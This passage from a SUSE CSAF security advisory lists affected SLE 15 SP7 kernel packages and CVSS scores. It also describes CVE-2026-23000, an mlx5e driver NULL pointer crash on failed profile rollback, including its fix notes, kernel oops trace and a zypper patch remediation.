"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23000",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23000"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Fix crash on profile change rollback failure\n\nmlx5e_netdev_change_profile can fail to attach a new profile and can\nfail to rollback to old profile, in such case, we could end up with a\ndangling netdev with a fully reset netdev_priv. A retry to change\nprofile, e.g. another attempt to call mlx5e_netdev_change_profile via\nswitchdev mode change, will crash trying to access the now NULL\npriv-\u003emdev.\n\nThis fix allows mlx5e_netdev_change_profile() to handle previous\nfailures and an empty priv, by not assuming priv is valid.\n\nPass netdev and mdev to all flows requiring\nmlx5e_netdev_change_profile() and avoid passing priv.\nIn mlx5e_netdev_change_profile() check if current priv is valid, and if\nnot, just attach the new profile without trying to access the old one.\n\nThis fixes the following oops, when enabling switchdev mode for the 2nd\ntime after first time failure:\n\n ## Enabling switchdev mode first time:\n\nmlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n ^^^^^^^^\nmlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0)\n\n ## retry: Enabling switchdev mode 2nd time:\n\nmlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload\nBUG: kernel NULL pointer dereference, address: 0000000000000038\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_detach_netdev+0x3c/0x90\nCode: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 \u003c48\u003e 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07\nRSP: 0018:ffffc90000673890 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000\nRDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000\nRBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000\nR10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000\nR13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000\nFS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n mlx5e_netdev_change_profile+0x45/0xb0\n mlx5e_vport_rep_load+0x27b/0x2d0\n mlx5_esw_offloads_rep_load+0x72/0xf0\n esw_offloads_enable+0x5d0/0x970\n mlx5_eswitch_enable_locked+0x349/0x430\n ? is_mp_supported+0x57/0xb0\n mlx5_devlink_eswitch_mode_set+0x26b/0x430\n devlink_nl_eswitch_set_doit+0x6f/0xf0\n genl_family_rcv_msg_doit+0xe8/0x140\n genl_rcv_msg+0x18b/0x290\n ? __pfx_devlink_nl_pre_doit+0x10/0x10\n ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10\n ? __pfx_devlink_nl_post_doit+0x10/0x10\n ? __pfx_genl_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x52/0x100\n genl_rcv+0x28/0x40\n netlink_unicast+0x282/0x3e0\n ? __alloc_skb+0xd6/0x190\n netlink_sendmsg+0x1f7/0x430\n __sys_sendto+0x213/0x220\n ? __sys_recvmsg+0x6a/0xd0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x50/0x1f0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7fdfb8495047",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
